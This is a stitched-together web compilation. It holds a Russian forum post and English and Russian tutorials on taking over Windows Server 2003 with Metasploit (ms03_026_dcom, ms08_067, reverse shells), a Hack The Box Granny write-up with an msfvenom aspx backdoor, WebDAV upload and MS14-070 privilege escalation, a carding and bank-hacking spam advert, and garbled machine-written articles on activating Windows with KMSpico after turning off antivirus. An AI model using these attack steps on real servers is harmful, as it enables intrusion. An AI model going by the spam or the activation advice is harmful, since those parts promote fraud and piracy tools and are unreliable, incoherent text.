Взломать windows server 2003

Всем привет
Сижу значить смотрю свой любимый форум))(CODEBY)
И как вдруг написал мне Друг. И спрашивает как залить эксплоит на сервер. Было это 1-2 месяца назад. В тот момент я понятие не имел как это вообще работает. И решил помочь ему. И пошёл копать информацию.
И через неделю несколько я получил что хотел)))
Вот результаты.

Сейчас мы попытаемся установить командную строку на сервере 2003, которая позволит нам удаленно выполнять команду в системе.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac) и запустите консоль Metasploit, и давайте начнем!
Экран запуска должен выглядеть следующим образом:

upload_2018-1-2_20-48-46.png

1) Найдите Exploit )
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года. Наберите:

Код:

[B]msf> search platform:windows type:exploit[/B]

Это должно дать нам список эксплойтов, которые мы можем использовать для систем Windows.

upload_2018-1-2_20-52-36.png

2)Выберите свой любимый
Давайте выберем проверенный и действительный эксплойт, который почти всегда успешно работает с Windows Server 2003, использует / windows / dcerpc / ms03_026_dcom. Тип:

Код:

msf> use exploit / windows / dcerpc / ms03_026_dcom

Чтобы получить дополнительную информацию об этом эксплойте, наберите:

Код:

msf exploit (ms03_26_dcom) info

upload_2018-1-2_20-55-21.png

3) Проверьте свои параметры
Чтобы начать использовать этот Windows Server 2003, сначала нужно проверить наши параметры. Тип:

Обратите внимание, что нам нужно установить RHOST или удаленный хост системы, которую мы используем. В моем случае это 78.XX.XXX.XXX (ваш, скорее всего, будет отличаться). Поэтому мы установили наш RHOST на 78.XX.XXX.XXX

Код:

[/B][/B]msf> set RHOST [B][B]78.XX.XXX.XXX[B][B]

upload_2018-1-2_21-7-41.png

4)Показать полезную нагрузку
Затем нам нужно установить полезную нагрузку для использования системы Windows Server 2003. В нашем случае мы рассмотрим возможность установки командной оболочки на серверной системе, чтобы мы могли управлять ею удаленно и дискретно. Мы могли бы отправить что-то вроде полезной информации VNC, где мы могли бы получить графический интерфейс системы, но это, скорее всего, будет замечено администратором системы, поскольку он видит, что его мышь перемещается по экрану. Мы будем использовать полезную нагрузку VNC в будущем взломе.

Итак, чтобы узнать, какие полезные ресурсы нам доступны, нам просто нужно ввести show payloads, а Metasploit перечислит все полезные ресурсы для этого эксплойта.

Код:

[/B][/B]msf > show payloads[B][B]

[/B][/B]

upload_2018-1-2_21-8-39.png

5) Подключение
См. Полезную нагрузку в верхней части с именем windows / shell_reverse_tcp? Это тот, который мы хотим использовать. Он подключится к окну Windows Server 2003 и вернет нам командную оболочку для удаленного управления системой жертвы. Тип:

Код:

set PAYLOAD windows/shell_reverse_tcp

6) Задайте параметры полезной нагрузки

Теперь, когда мы установили эксплойт и полезную нагрузку, осталось только указать параметры полезной нагрузки. Тип:

upload_2018-1-2_21-23-2.png

Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой — 192.168.1.XXX, поэтому я набрал:Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой — 192.168.1.XXX, поэтому я набрал:

Код:

[B]msf> [/B] set LHOST 192.168.1.XXX

Metasploit отправит полезную нагрузку в систему Windows Server 2003 и вернет вам командную строку. Теперь у вас есть (pwn) эта система! Если вы не получите приглашение командной строки в первый раз, повторите попытку, так как ни один из этих эксплойтов не работает на 100% каждый раз.
Так же работает и (Windows NT, 2000, XP и 2003)

)(Писал в спешке особенно последний Часть)

  • upload_2018-1-2_20-47-46.png

    16,6 КБ

    · Просмотры: 723

  • upload_2018-1-2_21-7-55.png

    29,8 КБ

    · Просмотры: 567

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.

Introduction

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

http://www.backtrack-linux.org/downloads/

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing in the command search along with the keyword lists out the various possible exploits that have that keyword pattern.
  2. show exploits : Typing in the command show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
  4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
  6. use : This command tells Metasploit to use the exploit with the specified name
  7. set RHOST : This command will instruct Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
  11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
  12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003
IP: IP: 192.168.42.128

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128

Objective

The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server 192.168.42.129.
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/or another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST 192.168.42.129” and we see that the RHOST is set to 192.168.42.129

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. 192.168.42.128 using the command “set LHOST 192.168.42.128

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Figure 13

Взлом Windows Server 2003 через эксплуатацию уязвимости в WebDAV

https://xakep.ru/2019/12/26/htb-pivoting/

Первой мы будем проходить виртуалку Granny. Эта машина достаточно проста (рейтинг сложности — 3,4 балла из 10), однако, как по мне, она максимально приближена к случаям из реальной жизни (по крайней мере там, где не следят за обновлениями ПО).

Hack The Box — Granny

Разведка

Для начала сканируем порты и исследуем найденные сервисы.

Nmap

Сканирование Nmap я провожу в два этапа: поверхностное (только SYN-пакеты, без скриптов) и точечное по найденным портам (с задействованием скриптового движка NSE и определением версий сервисов).

root@kali:~# nmap -n -Pn -oA nmap/granny-initial 10.10.10.15

root@kali:~# cat nmap/granny-initial.nmap

...

Host is up (0.065s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE

80/tcp open http

...

Видим только один открытый порт — 80-й, веб. Узнаем, кто там живет.

root@kali:~# nmap -n -Pn -sV -sC -oA nmap/granny-version 10.10.10.15 -p80

root@kali:~# cat nmap/granny-version.nmap

...

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 6.0

| http-methods:

|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT

|_http-server-header: Microsoft-IIS/6.0

|_http-title: Under Construction

| http-webdav-scan:

| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

| WebDAV type: Unknown

| Server Date: Sat, 21 Dec 2019 18:04:11 GMT

| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK

|_ Server Type: Microsoft-IIS/6.0

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

...

Итак, что у нас есть? Веб-сервер Microsoft IIS, версия 6.0. Если спросить Google, что он знает об этой ревизии IIS, то он сдаст «мелкомягких» с потрохами: Windows Server 2003.

Узнаем версию Windows по версии веб-сервера IIS

Информации об архитектуре Windows у нас нет, поэтому пока будем считать, что это x86, ибо они были более распространены в свое время. Также скрипт http-webdav-scan.nse оповестил нас об установленном наборе HTTP-расширений WebDAV. В общем, все намекает на то, что нам суждено отправиться на исследование веба.

Веб

Изучим 80-й порт с разных углов: от простого браузера до специальных утилит для работы с WebDAV.

Общие сведения

На главной странице веб-сервера (http://10.10.10.15/) — заглушка.

http://10.10.10.15:80/

Браузер оказался немногословен, поэтому постараемся расширить список наших знаний о системе заголовками HTTP-хедеров.

root@kali:~# curl -I 10.10.10.15

HTTP/1.1 200 OK

Content-Length: 1433

Content-Type: text/html

Content-Location: http://10.10.10.15/iisstart.htm

Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT

Accept-Ranges: bytes

ETag: "05b3daec0d9c21:348"

Server: Microsoft-IIS/6.0

MicrosoftOfficeWebServer: 5.0_Pub

X-Powered-By: ASP.NET

Date: Sat, 21 Dec 2019 21:51:01 GMT

В заголовках ожидаемо присутствует информация о том, что используется ASP.NET. Держи в голове две базовые схемы, когда речь заходит о стеке технологий веб-разработки:

  • LAMP = Linux + Apache + MySQL + PHP
  • WISA = Windows + IIS + SQL Server + ASP.NET

В нашем случае, так как речь идет о Windows, платформа ASP.NET выступает в роли альтернативы PHP. А это значит, что именно этот компонент стека будет средой для создания полезной нагрузки бэкдора, и было бы неплохо найти способ доставки на сервер файлов с расширением asp/aspx.

WebDAV

Надстройки WebDAV привносят дополнительные методы в дефолтный набор HTTP-запросов. Один из них — метод MOVE, который позволяет перемещать (грубо говоря, переименовывать) файлы на сервере. Идея нашего злодеяния довольно проста: загрузить на веб-сервер легитимный файл и переименовать его в исполняемый, изменив расширение на asp или aspx. Таким образом мы обойдем черный список из типов файлов, которые нельзя было загрузить изначально. Эта уловка стара как мир, а в основе ее лежит небезопасная настройка веб-сервера (OSVDB-397), доверяющая метод PUT кому угодно.

Для взаимодействия с WebDAV есть несколько удобных инструментов командной строки, которыми мы и воспользуемся.

Сначала исследуем состояние безопасности с помощью davtest. К сожалению, эта утилита не позволяет указать прокси-сервер, чтобы посмотреть, какие именно запросы были отправлены, поэтому мы пустимся на хитрость: запустим Burp Suite, перейдем на вкладку Proxy → Options и добавим еще один листенер 10.10.10.15:80 на интерфейс loopback.

Настройка дополнительного листенера в Burp Suite

Теперь я могу натравить davtest на localhost точно так же, как на 10.10.10.15, и все запросы полетят через проксю Burp.

root@kali:~# davtest -rand evilhacker -url localhost

********************************************************

Testing DAV connection

OPEN SUCCEED: localhost

********************************************************

NOTE Random string for this session: evilhacker

********************************************************

Creating directory

MKCOL FAIL

********************************************************

Sending test files

PUT aspx FAIL

PUT php FAIL

PUT cgi FAIL

PUT jhtml FAIL

PUT html FAIL

PUT asp FAIL

PUT txt FAIL

PUT cfm FAIL

PUT pl FAIL

PUT shtml FAIL

PUT jsp FAIL

********************************************************

Несмотря на то что, по мнению davtest, все попытки загрузить какой-либо файл на сервер провалились, мы можем открыть историю Burp и посмотреть, что же на самом деле произошло.

История HTTP-запросов Burp Suite

Как видно из скриншота, разные запросы PUT получили разные ответы веб-сервера:

  • при попытке загрузить файл с расширением aspx — категорический запрет (403);
  • для файлов .asp, .cgi, .shtml — неопределенное поведение (404, не уверен, почему IIS выбрал именно эту ошибку);
  • для всего остального — конфликт загрузки (409).

Последняя ошибка привлекла мое внимание, потому что встречается она не так часто и связана в основном с конфликтами версией загружаемого и существующего на сервере файлов.

«Этой ошибке здесь не место», — подумал я и посмотрел внимательнее на тело запроса загрузки простого текстового файла.

PUT /localhost/davtest_evilhacker.txt HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: close
Host: localhost:80
User-Agent: DAV.pm/v0.49
Content-Length: 19

TXT put via davtest

Вся проблема в том, что davtest попытался загрузить эти файлы в несуществующий каталог /localhost. Еще раз открыв историю HTTP, я увидел запрос MKCOL на создание директории, который также провалился с ошибкой 409. Выглядел он так.

MKCOL /localhost/DavTestDir_evilhacker/ HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: close
Host: localhost:80
User-Agent: DAV.pm/v0.49
Content-Length: 0

Как нетрудно догадаться, проблема заключается в попытке создать вложенный каталог /DavTestDir_evilhacker внутри несуществующего родителя /localhost. Не знаю, умеет ли так делать WebDAV в принципе (смотреть спецификацию было лень; может, в комментариях подскажут), но, если попробовать создать одноуровневую директорию /localhost, она успешно появится, и все встанет на свои места.

Создание каталога /localhost в Burp Suite
Загрузка текстового файла в каталог /localhost в Burp Suite

После этого текстовый файл успешно загрузился, а это означает, что наш план в силе и можно приступать к генерации полезной нагрузки.

Шелл от имени NT AUTHORITY\NETWORK SERVICE

Теперь у тебя есть несколько вариантов выбора полезной нагрузки, и все зависит только от конечной цели твоего проникновения в систему.

  • Например, если ты точно знаешь, где лежит то, что тебе нужно, и для доступа хватит базовых привилегий в системе, то можно ограничиться простым веб-шеллом, взаимодействовать с которым можно прямо из браузера.
  • Если же тебе нужно внимательнее осмотреться на хосте, тогда твоим выбором может стать тот же самый веб-шелл в связке с пейлоадом на PowerShell, что в итоге дарует тебе реверс-шелл.
  • Ну а если твоя цель — полный захват контроля над тачкой с эскалацией привилегий до админа, тогда Meterpreter — твой путь.

Конечно, мы выберем последний вариант.

Генерация пейлоада

С помощью msfvenom создадим бэкдор с полезной нагрузкой Meterpreter для 32-битной версии Windows в формате aspx.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 —platform win LHOST=10.10.14.10 LPORT=31337 -f aspx > meterpreter/m.aspx

Далее я создам скрипт автозапуска слушателя Metasploit, чтобы не вводить команды каждый раз вручную в консоли MSF.

## meterpreter/l.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 31337
set ExitOnSession false
exploit -j -z

cadaver

В Kali есть инструмент с жутковатым названием cadaver (то есть «труп») — это консольный WebDAV-клиент, который облегчает взаимодействие с WebDAV из командной строки.

Я скопирую сгенерированный в msfvenom бэкдор в текстовый файл m.txt, загружу его на сервер и переименую в m.aspx в интерактивной сессии cadaver.

root@kali:~# cp meterpreter/m.aspx m.txt

root@kali:~# cadaver http://10.10.10.15

dav:/> put m.txt

dav:/> move m.txt m.aspx

Загрузка и перемещение бэкдора с помощью cadaver

Теперь можно поднимать слушателя Metasploit и запускать сам файл m.aspx на сервере (просто обратиться к нему из браузера).

root@kali:~# msfconsole -qr meterpreter/l.rc

Запуск листенера Metasploit и получение сессии Meterpreter

И вот у нас уже есть сессия Meterpreter от имени NT AUTHORITY\NETWORK SERVICE.

К слову, все это можно было проделать одним кликом — модуль exploit/windows/iis/iis_webdav_upload_asp для Metasploit автоматизирует весь процесс.

Шелл от имени NT AUTHORITY\SYSTEM

Далее дело техники: запустим советчик по локальным уязвимостям и выберем наугад первый попавшийся эксплоит — благо тачка старая и выбор велик.

Поиск доступных локальных эксплоитов (ВМ Granny)

После минутного ожидания 29 уязвимостей были проверены, и семь из них подошли с высокой вероятностью.

Повышение привилегий с помощью MS14-070 (ВМ Granny)

Я выбрал MS14-070 — уязвимость виндового стека TCP/IP. Повышение привилегий с помощью Metasploit заняло считанные секунды, и я получил привилегированный шелл.

Если заспавнить шелл и спросить whoami, сервер ответит, что ты все еще обладаешь правами не выше NETWORK SERVICE. Происходит это из-за того, что пейлоад Meterpreter все еще инжектирован в первый процесс, который мы заарканили до повышения привилегий. Для того чтобы получить права SYSTEM из оболочки cmd, достаточно мигрировать вредоносный процесс в процесс с соответствующими привилегиями.

Who am I?

Я выбрал cidaemon.exe с PID 3964 в качестве носителя и подселился к нему.

Миграция в процесс cidaemon.exe (3964)

Теперь права отображаются корректно.

Я спрошу снова: Who am I?

Дело за малым: найти и вытащить хеши (флаги) юзера и администратора. Сделаю я это с помощью Meterpreter — а именно модулей search и download.

Получение флагов (ВМ Granny)

Напоследок посмотрим на разрядность ОС.

meterpreter > sysinfo

Computer : GRANNY

OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).

Architecture : x86

System Language : en_US

Domain : HTB

Logged On Users : 1

Meterpreter : x86/windows

Судя по сведениям sysinfo, наше предположение о 32-битной природе Windows подтвердилось.

На этом виртуалку Granny считаю пройденной.

As a professional penetration tester you will have to deal with various systems including Windows and Linux.Microsoft Servers have a large share in the market so probably most of your clients will have some versions of Windows Servers (2003 or 2008) that you will need to assess.In this article we will focus on exploitation a Windows 2003 server through the Microsoft directory services.

We have performed a port scan with Nmap and we have discovered that microsoft-ds service is open on port 445.The use of this service is for file sharing activities in Windows environments.

Microsoft-ds Service is Open

Our next step will be to open the metasploit framework in order to find the appropriate exploit that it will give us access to the remote server.We already know that the port 445 is for the SMB service.So our search will be on the SMB exploits like the netapi.

Specifically the exploit that we are going to use is the ms08_067_netapi which exploits a parsing flaw in the path canonicalization code of NetAPI32.dll.

Search for the netapi Exploit

So we are configuring the exploit with the appropriate IP addresses and we will use as a payload the meterpreter service.

Netapi Exploit Configuration

Now it is time to run the exploit against the target machine and as we can see from the image below it successfully opened a meterpreter session.

Exploitation with the Netapi

We can use the sysinfo command of the meterpreter in order to discover our first information about the Windows 2003 Server.

Information about the remote system

Conclusion

The microsoft-ds is a very common service in Windows machines.Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.Remember that if you are going to use this exploit against a Windows 2003 Server it will work only in the following versions: Windows 2003 SP0,Windows 2003 SP1 and Windows 2003 SP2.

Are you in a financial crisis, looking for money to start your own business or to pay your bills?
GET YOUR BLANK ATM CREDIT CARD AT AFFORDABLE PRICE*
We sell this cards to all our customers and interested buyers
worldwide,Tho card has a daily withdrawal limit of $5000 and up to $50,000
spending limit in stores and unlimited on POS.

YOU CAN ALSO MAKE BINARY INVESTMENTS WITH LITTLE AS $500 AND GET $10,000 JUST IN SEVEN DAYS

**WHAT WE OFFER**

*1)WESTERN UNION TRANSFERS/MONEY GRAM TRANSFER*
*2)BANKS LOGINS*
*3)BANKS TRANSFERS*
*4)CRYPTO CURRENCY MINNING*
*5)BUYING OF GIFT CARDS*
*6)LOADING OF ACCOUNTS*
*7)WALMART TRANSFERS*
*8)BITCOIN INVESTMENTS*
*9)REMOVING OF NAME FROM DEBIT RECORD AND CRIMINAL RECORD*
*10)BANK HACKING*
**email blankatmmasterusa@gmail.com *
**you can also call or whatsapp us Contact us today for more enlightenment *
*+1(539) 888-2243*
**BEWARE OF SCAMMERS AND FAKE HACKERS IMPERSONATING US BUT THEY ARE NOT
FROM *
*US CONTACT US ONLY VIA THIS CONTACT **
*WE ARE REAL AND LEGIT………..

2020 FUNDS/FORGET ABOUT GETTING A LOAN..*

IT HAS BEEN TESTED AND TRUSTED

На чтение 4 мин Опубликовано Обновлено

Windows Server 2003 является одной из наиболее популярных операционных систем для серверов. Однако, если у вас нет лицензионного ключа, активация системы может оказаться сложной задачей. В этой статье мы расскажем вам подробную инструкцию о том, как активировать Windows Server 2003 без ключа, а также дадим вам несколько рекомендаций для успешного выполнения этого процесса.

Прежде чем приступить к активации Windows Server 2003 без ключа, вам необходимо убедиться, что ваша копия операционной системы является подлинной и не нарушает авторские права. Одним из методов проверки является использование официального программного обеспечения от Microsoft — Genuine Advantage Diagnostic Tool. Это инструмент поможет вам узнать статус вашей копии операционной системы и определить, можете ли вы активировать ее без ключа.

Если ваша копия Windows Server 2003 прошла проверку и готова к активации, вы можете воспользоваться одним из методов активации без ключа. Один из популярных методов — использование утилиты KMSpico. Эта программа предоставляет возможность активировать Windows Server 2003 без ключа. Однако, следует помнить, что использование таких программ может нарушать законы о защите авторских прав и не гарантирует стабильную работу системы.

Следует отметить, что активация Windows Server 2003 без ключа является незаконной и рискованной деятельностью. Мы рекомендуем всегда использовать лицензионное программное обеспечение и соблюдать правила авторского права.

Также важно отметить, что Windows Server 2003 является устаревшей операционной системой и больше не получает поддержку от Microsoft. Для обеспечения безопасности и стабильной работы системы, рекомендуется обновиться на более современную версию Windows Server.

Содержание

  1. Активация Windows Server 2003:
  2. Почему нужно активировать Windows Server 2003:
  3. Как активировать Windows Server 2003 без ключа:

Ниже представлены рекомендации по активации Windows Server 2003 без ключа:

  1. Откройте «Панель управления».
  2. Выберите «Система и безопасность».
  3. Нажмите на «Система».
  4. В открывшемся окне выберите «Активация Windows».
  5. Выберите «Активировать Windows через Интернет».
  6. Дождитесь завершения процесса активации. В случае успеха вы увидите сообщение об успешной активации.

Если активация через Интернет невозможна, вам понадобится активировать операционную систему по телефону. Для этого следуйте следующим инструкциям:

  1. Откройте «Система».
  2. В открывшемся окне выберите «Активация Windows».
  3. Выберите «Активировать Windows по телефону».
  4. Следуйте инструкциям оператора по активации. Вам будет предоставлен уникальный код активации, который необходимо ввести в соответствующее поле.
  5. После ввода кода активации нажмите «Готово».
  6. Дождитесь завершения процесса активации. В случае успеха вы увидите сообщение об успешной активации.

После успешной активации Windows Server 2003 вы сможете использовать все функции операционной системы без ограничений. Регулярно проверяйте статус активации и следите за обновлениями системы для обеспечения безопасности сервера.

Почему нужно активировать Windows Server 2003:

Без активации Windows Server 2003 доступ к определенным функциям и возможностям операционной системы будет ограничен. Некоторые службы и сервисы могут быть недоступны, что может привести к нарушению работы сервера и возникновению проблем в работе организации.

Кроме того, активация помогает соблюдать лицензионные правила, устанавливаемые Microsoft. Незаконное использование Windows Server 2003 может привести к серьезным юридическим последствиям, включая штрафы и судебные разбирательства.

Активация Windows Server 2003 также необходима для получения обновлений и патчей безопасности. Microsoft регулярно выпускает обновления, которые исправляют уязвимости системы и повышают ее стабильность. Без активации сервер не сможет получать эти обновления, что может привести к уязвимостям и потенциальному взлому системы.

Активация Windows Server 2003 предоставляет пользователям возможность полноценно использовать функции и сервисы системы, обеспечивает безопасность работы сервера и позволяет быть в соответствии с лицензионными политиками Microsoft. Правильная активация операционной системы является важным шагом для обеспечения надежности и стабильности работы сервера.

Как активировать Windows Server 2003 без ключа:

  1. Первым шагом является установка Windows Server 2003 на ваш компьютер. Убедитесь, что у вас есть права администратора для установки и настройки операционной системы.
  2. После завершения установки и перезагрузки компьютера, откройте меню «Пуск» и выберите пункт «Активация Windows».
  3. В появившемся окне «Активация Windows» выберите опцию «Активация по телефону».
  4. После выбора опции «Активация по телефону» вам будет предложено ввести региональный код и номер телефона. Введите соответствующую информацию и нажмите кнопку «Далее».
  5. На следующем экране появится unambiguous identification number (UID). Скопируйте этот номер и используйте его при последующем разговоре с оператором по телефону.
  6. Позвоните в microsoft support по указанному номеру телефона и следуйте инструкциям оператора. Оператор запросит UID и другую информацию для подтверждения вашего запроса на активацию.
  7. После подтверждения запроса оператором, вам будет предоставлен Confirmation ID. Введите этот код в соответствующем поле и нажмите кнопку «Далее».
  8. Вам будет показано окно с подтверждением успешной активации Windows Server 2003 без использования ключа.
  9. Для окончательной активации перезагрузите компьютер.

Теперь ваш Windows Server 2003 будет полностью активирован и готов к использованию без ключа.

Windows Server 2003 — одна из самых популярных операционных систем в сфере серверных решений. Но что делать, если у вас нет лицензионного ключа для активации? В этой статье мы расскажем о нескольких эффективных способах активации Windows Server 2003 без ключа.

Первый способ — использование программы KeyGen. KeyGen — это программа, которая генерирует лицензионные ключи для различных программ. С ее помощью можно сгенерировать ключ для активации Windows Server 2003. Но стоит помнить, что использование таких программ является нарушением закона и может привести к серьезным последствиям.

Второй способ — использование командной строки. Для этого нужно открыть командную строку от имени администратора и выполнить несколько команд. С помощью команды slmgr.vbs можно активировать операционную систему без ключа. Однако, в этом случае активация будет временной и через некоторое время система может потребовать повторной активации.

Третий способ — использование активатора. Активаторы — это программы, которые помогают обойти активацию операционной системы. Они подменяют оригинальные файлы системы и позволяют использовать ее без активации. Однако, стоит помнить, что такие программы могут содержать вредоносный код и нанести вред вашему компьютеру.

Важно помнить, что активация Windows Server 2003 без лицензионного ключа является нарушением закона. Рекомендуется всегда приобретать лицензионные копии операционных систем и программного обеспечения, чтобы избежать неприятностей.

Содержание

  1. Основные причины активации Windows Server 2003
  2. Подробное рассмотрение первого способа активации
  3. Второй способ активации Windows Server 2003 без ключа
  4. Эффективные методы активации Windows Server 2003 без использования ключа

Основные причины активации Windows Server 2003

Активация операционной системы является обязательной процедурой, которую необходимо выполнить после установки Windows Server 2003.

Основные причины активации Windows Server 2003:

  • Легальность: Активация позволяет подтвердить, что установленная копия Windows Server 2003 является оригинальной и лицензионной, что обеспечивает легальную работу с операционной системой.
  • Безопасность: Активация помогает защитить операционную систему от несанкционированного доступа и использования. Это позволяет предотвратить распространение нелицензионных копий операционной системы и защитить данные, хранящиеся на сервере.
  • Регулирование функциональности: Активация позволяет разработчикам контролировать использование операционной системы и настраивать ее функциональность в соответствии с лицензионными соглашениями.
  • Получение обновлений: Активация Windows Server 2003 позволяет получать официальные обновления, исправления и патчи от Microsoft, что помогает улучшить производительность и безопасность сервера.
  • Техническая поддержка: Активированная копия операционной системы имеет право на получение технической поддержки от разработчиков, что важно при возникновении проблем и неисправностей.

В итоге, активация Windows Server 2003 позволяет обеспечить легальную, безопасную и работоспособную работу сервера, а также получить доступ к официальным обновлениям и технической поддержке.

Подробное рассмотрение первого способа активации

Первый способ активации Windows Server 2003 без ключа заключается в использовании специальной программы KMSpico. Данное решение позволяет активировать операционную систему без необходимости вводить серийный ключ и имеет высокую степень эффективности.

Для активации Windows Server 2003 с помощью KMSpico необходимо выполнить следующие шаги:

  1. Скачайте программу KMSpico с официального сайта разработчика или проверенных источников.
  2. Убедитесь, что на вашем компьютере отключена антивирусная программа, так как она может блокировать работу KMSpico.
